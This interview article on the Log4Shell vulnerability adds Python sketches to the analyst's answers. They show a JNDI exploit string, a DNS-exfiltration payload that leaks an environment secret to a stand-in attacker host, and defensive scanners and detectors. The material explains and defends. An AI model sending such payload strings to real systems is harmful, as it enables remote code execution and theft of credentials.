Log4j: protecting only remotely accessible servers is a mistake - opinion

It's been almost two weeks since the severe vulnerability in the Log4j logging library was publicly disclosed. We are starting to see more severe consequences, but the problem hasn't yet peaked.

Since the beginning of the public debate on the vulnerability, dubbed Log4Shell, experts have been speculating that this is the Fukushima moment for cybersecurity. They anticipate that the consequences might be severe, but we might not learn about the magnitude of this cybersecurity earthquake for months.

CyberNews caught up with Peter Rydzynski, Principal Threat Analyst at IronNet Cybersecurity, to discuss how the situation has developed over the past two weeks.

It's been almost two weeks since the severe vulnerability in the Log4j logging library was publicly disclosed. What has happened during that period? How bad is it?

Firstly, the reason it is so severe is partly the ubiquitous use of Java applications all over the place and, within those Java applications, the use of the Log4j library specifically. It is used in so many locations, and on top of that, the exploit was incredibly trivial. You could show the exploit string to someone with no background in computer science or computer security, and they could probably understand what it does and how to configure it to do something they want. It is very simple to execute. Additionally, the delivery mechanism made it incredibly severe, because you could deliver the exploit from anywhere on the internet.
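To illustrate how trivial the exploit string is, here is a simplified Python sketch, not Log4j's actual code, of the lookup pattern it abuses. The hostname is illustrative, and the real library resolved the JNDI reference rather than merely matching it:

```python
import re

# The classic Log4Shell payload embeds a JNDI lookup in any string the
# application logs (a User-Agent header, a username, a chat message, ...).
# The hostname below is illustrative, not a real attacker endpoint.
PAYLOAD = "${jndi:ldap://attacker.example.com/a}"

# Simplified model of what vulnerable Log4j versions did: scan the message
# for ${jndi:...} lookup tokens and act on them. Real Log4j resolved the
# JNDI reference, which could load and execute attacker-supplied code.
LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/}]+)(/[^}]*)?\}")

def find_jndi_lookups(log_message: str):
    """Return (protocol, host) pairs for any JNDI lookups in the message."""
    return [(m.group(1), m.group(2)) for m in LOOKUP.finditer(log_message)]

# Anything that logs attacker-controlled input is enough to trigger it:
hits = find_jndi_lookups(f"User-Agent: {PAYLOAD}")
print(hits)  # [('ldap', 'attacker.example.com')]
```

The point of the sketch is that the payload is human-readable: anyone can see which host it points to and swap in their own.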

As these things go, patch processes took place, a fixed version of Log4j was released, and almost immediately we found out that version was still vulnerable. It became a typical game: every time you think you are good because you've patched up to a particular version, you are still not secure. We chased this vulnerability all the way to the point where they deactivated the feature entirely. That vulnerable feature has now been completely removed from the Log4j library.
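The version chase described above can be sketched as a simple check. Treating 2.17.1 as the safe floor for Log4j 2.x here is an assumption based on the advisories published around this period (2.15.0's fix was incomplete, and 2.16.0 still had a denial-of-service issue); always check the current Apache advisories rather than hard-coding a floor:

```python
def parse_version(v: str):
    """Turn a dotted version string like '2.16.0' into a comparable tuple."""
    return tuple(int(x) for x in v.split("."))

def still_vulnerable(version: str, safe_floor: str = "2.17.1") -> bool:
    """Treat anything below the assumed safe floor as needing an upgrade.

    The default floor is an assumption for Log4j 2.x on current Java;
    2.15.0 and 2.16.0 were each released as fixes and then superseded.
    """
    return parse_version(version) < parse_version(safe_floor)

for v in ["2.14.1", "2.15.0", "2.16.0", "2.17.1"]:
    print(v, still_vulnerable(v))
```

This mirrors the experience the answer describes: a check written against 2.15.0 or 2.16.0 as the floor would have reported "secure" for versions that later advisories showed were not.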

Does the fact that it is disabled prevent you from cyberattacks?

Just because there is a secure version doesn't mean it is easy to get to that version, and it also doesn't mean that it is easy for you to know where all of the applications using Log4j are in your network.
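One common audit approach for the discovery problem is to look inside each jar for the JndiLookup class rather than relying on filenames, since Log4j is often bundled inside application jars. A minimal Python sketch (the scan path is illustrative, and nested jars-within-jars would need recursion, omitted here):

```python
import zipfile
from pathlib import Path

# The class that implements the vulnerable JNDI lookup feature.
VULN_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def jars_with_jndi_lookup(root: str):
    """Recursively find jars under `root` that bundle the JndiLookup class."""
    hits = []
    for jar in Path(root).rglob("*.jar"):
        try:
            with zipfile.ZipFile(jar) as zf:
                if VULN_CLASS in zf.namelist():
                    hits.append(str(jar))
        except zipfile.BadZipFile:
            continue  # skip corrupt or non-zip files
    return hits

# Example (path illustrative): jars_with_jndi_lookup("/opt/myapp")
```

A filename search for "log4j" misses shaded and repackaged copies; checking jar contents catches those too, which is exactly why knowing "where all the Log4j is" turns out to be hard.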

What happened during these past weeks? We saw crypto miners starting to exploit the vulnerability, nation-states jumping in, ransomware gangs eyeing the vulnerability, and even the Belgian defense ministry falling victim to a cyberattack allegedly caused by this vulnerability.

I think that more will definitely come to light as time goes on because, with these kinds of exploitations, you see very rapid adoption by botnets and crypto mining. And we definitely saw that. Things like Mirai, which have spread across the internet using similar exploits for a long time, picked this up quickly. But nation-states and more sophisticated actors need a little bit of time to work new exploits into their operations, and for those things to come to light. I think we are going to see more of that. We are seeing now that the Conti ransomware group has adopted this exploit in its operations, so that's another concern: ransomware is absolutely a viable delivery vector here. Given the nature of the exploit, you are often going to land on a server that isn't being monitored as heavily as a host endpoint. Additionally, a server may have broader access into the network, making it easy to move laterally from that landing point. Ransomware is a strong concern here.

But even those companies that have patched might still be vulnerable as the attacker might already be inside their network, right?

One concern here is that an attacker had already exploited your server and moved on to other locations within your network before you were able to patch. But a bigger concern is actually on the information-stealing side. People may think they are ok because they didn't see any subsequent command-and-control activity or lateral movement, but what they didn't realize is that the attacker used the DNS exfiltration mechanism available within this exploit and exfiltrated sensitive environment variables, including passwords, that an attacker can use later to come back and attack your network at their pleasure.
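The DNS trick described here can be illustrated with a simplified simulation of the nested-lookup substitution: an environment-variable lookup resolves inside the hostname, so the secret leaves the network inside an ordinary DNS query. The variable name, value, and domain below are all illustrative, and this is a sketch of the mechanism, not Log4j's actual substitution code:

```python
import re

def expand_env_lookups(payload: str, env: dict) -> str:
    """Mimic, in simplified form, Log4j's ${env:VAR} lookup substitution."""
    return re.sub(r"\$\{env:([A-Z_]+)\}",
                  lambda m: env.get(m.group(1), ""), payload)

# Illustrative secret; a real attack reads the server's actual environment.
fake_env = {"AWS_SECRET_ACCESS_KEY": "hunter2"}
payload = "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.exfil.attacker.example/a}"

resolved = expand_env_lookups(payload, fake_env)
print(resolved)
# ${jndi:ldap://hunter2.exfil.attacker.example/a}
# The DNS lookup for that hostname alone delivers the secret to whoever
# runs the attacker's nameserver - no command-and-control traffic needed.
```

This is why "we saw no follow-up activity" is not reassuring: the theft is complete the moment the DNS query leaves the network.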

There are a lot of angles to this. Just patching a server that was exposed to the internet and thinking that you are safe is not a good idea.

You've mentioned that sophisticated threat actors might need time to fit this vulnerability into their attack vectors. On average, it takes 14 weeks even to detect an intruder. Does it mean that we are yet to learn about the significance and severity of this vulnerability, as well as the actual damage it caused?

I believe that they are ongoing. We've already had indications that nation-states are leveraging this exploit, but I will say that we might never learn the full scope of these kinds of attacks. And yes, these things take time. If you look at the reports out of Mandiant, FireEye, and other organizations that do incident response for the government, you will notice that they typically come six to nine months after the activity was discovered by defensive companies, let alone after the activity started in those networks.

You said that patching is not enough. What should companies additionally do to stay safe?

What really should be done in cases like this is what you should be doing all the time, not just when something like Log4j happens. You should assume a posture of 'I have already been attacked' at all times, and expect that you are compromised. You should have the appropriate processes documented so that when you discover a threat actor in your network, you can take action. Furthermore, you need monitoring systems that pay attention to the internal portions of your network. You can't just watch the edge and the firewall, say, 'hey, we saw these Log4j exploits, but we've patched them, and we are good,' and then not look inside. You have to monitor traffic and hosts, looking for lateral movement and the second-stage activities that happen after an exploit succeeds on your edge.
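The internal-monitoring advice can be sketched as a toy baseline comparison over east-west connection pairs: learn which internal hosts normally talk to each other, then flag pairs never seen before. The hostnames and baseline are illustrative, and real network traffic analysis tools do far more than this:

```python
# Historical baseline of normal internal (source, destination) pairs.
# Illustrative hosts; in practice this is learned from flow logs over time.
baseline = {("web-01", "db-01"), ("web-01", "cache-01")}

def flag_new_internal_pairs(flows, baseline):
    """Return (src, dst) pairs not present in the historical baseline."""
    return [pair for pair in flows if pair not in baseline]

today = [("web-01", "db-01"), ("web-01", "dc-01"), ("web-01", "backup-01")]
print(flag_new_internal_pairs(today, baseline))
# [('web-01', 'dc-01'), ('web-01', 'backup-01')]
```

A patched web server suddenly touching the domain controller or the backup host is exactly the kind of second-stage signal that edge-only monitoring misses.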

Again, this is something you should be doing all the time, not just because Log4j is happening now; an event like Log4j just shows how important it is to have adopted this strategy already. If you haven't, and you are late at this point, you need to put these things in place now and get network traffic analysis tools that let you see, 'hey, who was touching my servers, and what did my servers do after these malicious actors touched them?'

Do you think enough companies are patching the vulnerability? We saw with the Microsoft Exchange servers that there were still tens of thousands of unpatched servers weeks after the bug was discovered.

I think the attention on this particular incident has been incredible, and that a good majority of people are patching. But let me speculate as far as my fears go. People think the edges are the priority, which they are. They believe that anything that can be hit from the internet should be patched, but the inside can wait. What happens is that sometimes those internal systems get forgotten, or even intentionally overlooked, because the risk is assumed to be too small to act on. I hope that doesn't happen, because this is a goldmine for an attacker who's already in the network. It might be tempting for defenders to say, 'that's not remotely accessible, no one's going to attack that server, it's only accessible to internal employees, it's no big deal.' In reality, an attacker inside the network could very simply access and exploit such a server. You might think it is not a priority, but patching is a priority across every portion of your network, even the most sensitive, restricted-access enclaves.
